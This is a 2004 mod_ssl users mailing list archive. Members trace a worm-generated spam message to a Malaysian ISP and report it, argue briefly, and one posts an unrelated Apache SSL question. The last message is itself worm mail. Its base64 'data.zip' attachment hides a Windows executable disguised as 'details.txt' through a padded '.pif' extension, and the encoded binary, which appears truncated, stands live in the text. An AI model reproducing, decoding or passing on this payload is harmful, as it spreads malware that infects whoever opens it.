Received: from maggotts.rnib.org.uk ([127.0.0.1])
 by localhost (maggotts.rnib.org.uk [127.0.0.1]) (amavisd-new, port 10024)
 with LMTP id 02143-01-2; Tue, 30 Mar 2004 13:51:26 +0100 (BST)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [10.254.1.122])
	by maggotts.rnib.org.uk (8.12.8/8.12.8) with ESMTP id i2UCk18A001877;
	Tue, 30 Mar 2004 13:46:02 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2657.72)
	id ; Tue, 30 Mar 2004 13:45:56 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F05ADDEA0@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Cc: abuse@tm.net.my
Subject: RE: Hey, dude, it's me ^_^ :P
Date: Tue, 30 Mar 2004 13:45:55 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2657.72)
Content-Type: text/plain;
	charset="iso-8859-1"
X-Virus-Scanned: by amavisd-new at rnib.org.uk
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> -----Original Message-----
> From: rse@engelschall.com [mailto:rse@engelschall.com]
> Sent: Tuesday, 30 March 2004 12:38
> To: modssl-users@modssl.org
> Subject: Hey, dude, it's me ^_^ :P
> 
> 
> Argh,  i don't  like  the plaintext :)
> 
> pass: 56270
> 

In case anyone hasn't guessed, this has come from Telekom Malaysia, not
Ralf. Specifically it came from 202.188.53.169, which APNIC says is:

inetnum:      202.188.0.0 - 202.188.255.255
netname:      TMNET-MY-1
descr:        TMnet Telekom Malaysia
country:      MY
admin-c:      TA35-AP
tech-c:       TA35-AP
remarks:      Send abuse email to abuse@tm.net.my
remarks:      tmcops@tm.net.my or dnsteam@tm.net.my
mnt-by:       APNIC-HM
mnt-lower:    TM-NET-AP
changed:      adzmi@tm.net.my 19990526
changed:      hostmaster@apnic.net 20010124
status:       ALLOCATED PORTABLE
source:       APNIC

Can someone at Telekom Malaysia fix this please?

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Shameless movie plug - go see the Passion of the Christ!

- 
DISCLAIMER: 

NOTICE: The information contained in this email and any attachments is 
confidential and may be privileged. If you are not the intended 
recipient you should not use, disclose, distribute or copy any of the 
content of it or of any attachment; you are requested to notify the 
sender immediately of your receipt of the email and then to delete it 
and any attachments from your system. 

RNIB endeavours to ensure that emails and any attachments generated by 
its staff are free from viruses or other contaminants. However, it 
cannot accept any responsibility for any  such which are transmitted.
We therefore recommend you scan all attachments. 

Please note that the statements and views expressed in this email and 
any attachments are those of the author and do not necessarily represent 
those of RNIB. 

RNIB Registered Charity Number: 226227 

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 30 17:20:14 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D3924A8995; Tue, 30 Mar 2004 17:20:14 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from pulsar (valleyhouse.demon.co.uk [194.222.197.55])
	by master.modssl.org (Postfix) with ESMTP id 7D294A893A
	for ; Tue, 30 Mar 2004 17:19:56 +0200 (CEST)
Received: from hades.vh.uk ([192.168.45.100] helo=hades)
	by pulsar with smtp (Exim 4.30)
	id 1B8L1n-0000O7-Bn
	for modssl-users@modssl.org; Tue, 30 Mar 2004 16:19:47 +0100
Message-ID: <000901c4166a$6f5a4d70$642da8c0@hades>
From: "madhon" 
To: 
References: <9B66BBD37D5DD411B8CE00508B69700F05ADDEA0@pborolocal.rnib.org.uk>
Subject: Re: Hey, dude, it's me ^_^ :P
Date: Tue, 30 Mar 2004 16:19:46 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1209
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1213
X-Spam-Score: 0.0 (/)
X-Spam-Report: ---- Start SpamAssassin results
	0.0 points, 6.0 required;
	---- End of SpamAssassin results
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "madhon" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> inetnum:      202.188.0.0 - 202.188.255.255
> netname:      TMNET-MY-1
> descr:        TMnet Telekom Malaysia
> country:      MY
> admin-c:      TA35-AP
> tech-c:       TA35-AP
> remarks:      Send abuse email to abuse@tm.net.my
> remarks:      tmcops@tm.net.my or dnsteam@tm.net.my
> mnt-by:       APNIC-HM
> mnt-lower:    TM-NET-AP
> changed:      adzmi@tm.net.my 19990526
> changed:      hostmaster@apnic.net 20010124
> status:       ALLOCATED PORTABLE
> source:       APNIC
>
> Can someone at Telekom Malaysia fix this please?

instead of asking here you are better off emailing to abuse@tm.net.my just
like it says in the remarks

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 30 17:36:37 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D40FAA8963; Tue, 30 Mar 2004 17:36:37 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.193])
	by master.modssl.org (Postfix) with ESMTP id 989FBA893A
	for ; Tue, 30 Mar 2004 17:36:21 +0200 (CEST)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by maggotts.rnib.org.uk (8.12.8/8.12.8) with ESMTP id i2UFaH58021778
	for ; Tue, 30 Mar 2004 16:36:17 +0100
Received: from maggotts.rnib.org.uk ([127.0.0.1])
 by localhost (maggotts.rnib.org.uk [127.0.0.1]) (amavisd-new, port 10024)
 with LMTP id 21699-01-8 for ;
 Tue, 30 Mar 2004 16:36:17 +0100 (BST)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [10.254.1.122])
	by maggotts.rnib.org.uk (8.12.8/8.12.8) with ESMTP id i2UFa68A021689
	for ; Tue, 30 Mar 2004 16:36:06 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2657.72)
	id ; Tue, 30 Mar 2004 16:35:59 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F05ADDEA2@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: Hey, dude, it's me ^_^ :P
Date: Tue, 30 Mar 2004 16:36:00 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2657.72)
Content-Type: text/plain;
	charset="iso-8859-1"
X-Virus-Scanned: by amavisd-new at rnib.org.uk
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> -----Original Message-----
> From: madhon [mailto:madhon@madhon.co.uk]
> Sent: Tuesday, 30 March 2004 16:20
> To: modssl-users@modssl.org
> Subject: Re: Hey, dude, it's me ^_^ :P
> 
> 
> > inetnum:      202.188.0.0 - 202.188.255.255
> > netname:      TMNET-MY-1
> > descr:        TMnet Telekom Malaysia
> > country:      MY
> > admin-c:      TA35-AP
> > tech-c:       TA35-AP
> > remarks:      Send abuse email to abuse@tm.net.my
> > remarks:      tmcops@tm.net.my or dnsteam@tm.net.my
> > mnt-by:       APNIC-HM
> > mnt-lower:    TM-NET-AP
> > changed:      adzmi@tm.net.my 19990526
> > changed:      hostmaster@apnic.net 20010124
> > status:       ALLOCATED PORTABLE
> > source:       APNIC
> >
> > Can someone at Telekom Malaysia fix this please?
> 
> instead of asking here you are better off emailing to 
> abuse@tm.net.my just
> like it says in the remarks

They were cc'ed in the message so they have been asked. The list was
informed so that they could see that something useful was being done about
this problem. Now would you mind telling me how useful your post was?

Thank you.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Shameless movie plug - go see the Passion of the Christ!

- 
DISCLAIMER: 

NOTICE: The information contained in this email and any attachments is 
confidential and may be privileged. If you are not the intended 
recipient you should not use, disclose, distribute or copy any of the 
content of it or of any attachment; you are requested to notify the 
sender immediately of your receipt of the email and then to delete it 
and any attachments from your system. 

RNIB endeavours to ensure that emails and any attachments generated by 
its staff are free from viruses or other contaminants. However, it 
cannot accept any responsibility for any  such which are transmitted.
We therefore recommend you scan all attachments. 

Please note that the statements and views expressed in this email and 
any attachments are those of the author and do not necessarily represent 
those of RNIB. 

RNIB Registered Charity Number: 226227 

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 30 18:07:56 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 97269A8A49; Tue, 30 Mar 2004 18:07:56 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from pulsar (valleyhouse.demon.co.uk [194.222.197.55])
	by master.modssl.org (Postfix) with ESMTP id 14C2DA8963
	for ; Tue, 30 Mar 2004 18:07:40 +0200 (CEST)
Received: from hades.vh.uk ([192.168.45.100] helo=hades)
	by pulsar with smtp (Exim 4.30)
	id 1B8Lm3-0000UY-Eu
	for modssl-users@modssl.org; Tue, 30 Mar 2004 17:07:35 +0100
Message-ID: <001b01c41671$1cd51a60$642da8c0@hades>
From: "madhon" 
To: 
References: <9B66BBD37D5DD411B8CE00508B69700F05ADDEA2@pborolocal.rnib.org.uk>
Subject: Re: Hey, dude, it's me ^_^ :P
Date: Tue, 30 Mar 2004 17:07:34 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1209
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1213
X-Spam-Score: 0.0 (/)
X-Spam-Report: ---- Start SpamAssassin results
	0.0 points, 6.0 required;
	---- End of SpamAssassin results
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "madhon" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> They were cc'ed in the message so they have been asked. The list was
> informed so that they could see that something useful was being done about
> this problem.

Fair enough i didnt notice that (wasnt looking that much either)

> Now would you mind telling me how useful your post was?

would you mind telling me how usefull that attitude is ?

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 30 18:52:14 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6C4BEA8963; Tue, 30 Mar 2004 18:52:14 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cyrus.vandervecken.com (cyrus.vandervecken.com [64.124.43.248])
	by master.modssl.org (Postfix) with ESMTP id 046FBA8938
	for ; Tue, 30 Mar 2004 18:51:58 +0200 (CEST)
Received: from geoff by cyrus.vandervecken.com with local (Exim 3.35 #1 (Debian))
	id 1B8MSo-00061j-00; Tue, 30 Mar 2004 08:51:46 -0800
From: Geoff Thorpe 
To: modssl-users@modssl.org
Subject: Re: Hey, dude, it's me ^_^ :P
Date: Tue, 30 Mar 2004 11:51:10 -0500
User-Agent: KMail/1.6.1
References: <9B66BBD37D5DD411B8CE00508B69700F05ADDEA2@pborolocal.rnib.org.uk> <001b01c41671$1cd51a60$642da8c0@hades>
In-Reply-To: <001b01c41671$1cd51a60$642da8c0@hades>
MIME-Version: 1.0
Content-Disposition: inline
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <200403301151.10293.geoff@geoffthorpe.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On March 30, 2004 11:07 am, madhon wrote:
> Fair enough i didnt notice that (wasnt looking that much either)
>
> > Now would you mind telling me how useful your post was?
>
> would you mind telling me how usefull that attitude is ?

whoah ... there's only two things worse than being inundated with spam;
  (1) being inundated with tit-for-tats that escalate into flame-wars 
through a strange interplay of ASCII's inability to convey emotive 
context and an ego's inability to remain rational in a public forum.
  (2) when (1) stems from trying to deal with an inundation of spam.

John, thanks for trying to deal with the problem. Madhon, chill - you 
pestered John on the mail list because you hadn't noticed the CC line, a 
simple ack would have calmly ended things there. John's dealing with 
spam, like every other frustrated list user these days, so you'd expect 
him to get irritable when someone adds to the bandwidth by (mistakenly) 
hassling him for having tried to help - why bait further and risk turning 
an anti-spam effort into a flame-war? (Note, the question is rhetorical, 
I don't need a response unless it's to do something useful for modssl, 
against spam, or both). FWIW, I've made far worse cock-ups on public 
lists than you just did, and I'm sure I've many more in store for me yet, 
so don't feel attacked to have goofed up (and therefore, don't feel any 
need to counter-attack).

I apologise for adding to the bandwidth, but I think this kind of 
frustration is simmering everywhere right now with the amount of spam and 
worms/virii floating round - we need to adjust our methods for handling 
this if we're to avoid crossing the noise-to-signal event horizon that 
usenet long since disappeared over. The obvious starting point is to not 
add to the list noise, except perhaps to collaborate on solving the 
problem ...

... so to add to what John already contributed, I'd like to suggest that 
those of you who are pissed about this sort of thing should learn to read 
and analyse mail headers (if you don't already know how) and do what John 
just did. If you don't know or you're not sure what you're doing, wait 
for someone to do what John did (and perhaps wait a while in case someone 
else finds a problem or correction) and then *privately* do the same - 
ie. mail the appropriate abuse-reporting address (abuse@tm.net.my in this 
case).

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 30 22:24:07 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9B10BA8963; Tue, 30 Mar 2004 22:24:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from kinetic-tech.com (mail.pdidesign.com [64.207.47.44])
	by master.modssl.org (Postfix) with ESMTP id 0CD25A8938
	for ; Tue, 30 Mar 2004 22:24:06 +0200 (CEST)
Received: from kinetic-tech.com [209.180.246.58] by kinetic-tech.com with ESMTP
  (SMTPD32-8.05) id A7AFB80308; Tue, 30 Mar 2004 13:25:19 -0700
Message-ID: <4069D74E.3060802@kinetic-tech.com>
Date: Tue, 30 Mar 2004 13:23:42 -0700
From: support 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: users@httpd.apache.org, modssl-users@modssl.org,
	openssl-users@openssl.org
Subject: Error load ssl_mod.so
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: support 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I've been working on an Apache 1.3 server install under Windows for 
several days and went restart Apache and got the following message...

Cannot load mod_ssl.so into server (182)

I've done everything including a complete wipe and replace of Apache and 
get the same message everytime I launch Apache with SSL support. The 
check sum on mos_ssl.so is correct as is the path. If I do an install on 
any other Windows box Apache runs flawlessly.

Has anyone else every tackled this problem?

Kevin


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From arkobad@centrum.cz  Wed Mar 31 08:03:00 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from master.modssl.org (teazmail.teaz.cz [212.71.157.203])
	by master.modssl.org (Postfix) with ESMTP id D680AA8946
	for ; Wed, 31 Mar 2004 08:02:48 +0200 (CEST)
From: arkobad@centrum.cz
To: modssl-users-l@master.modssl.org
Subject: Re: Protected Mail Request
Date: Wed, 31 Mar 2004 08:02:55 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0016----=_NextPart_000_0016"
X-Priority: 3
X-MSMail-Priority: Normal
Message-Id: <20040331060248.D680AA8946@master.modssl.org>

This is a multi-part message in MIME format.

------=_NextPart_000_0016----=_NextPart_000_0016
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit


You have received an extended message. Please read the instructions.


+++ Attachment: No Virus found
+++ Kaspersky AntiVirus - www.kaspersky.com


------=_NextPart_000_0016----=_NextPart_000_0016
Content-Type: application/octet-stream;
	name="data.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="data.zip"

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
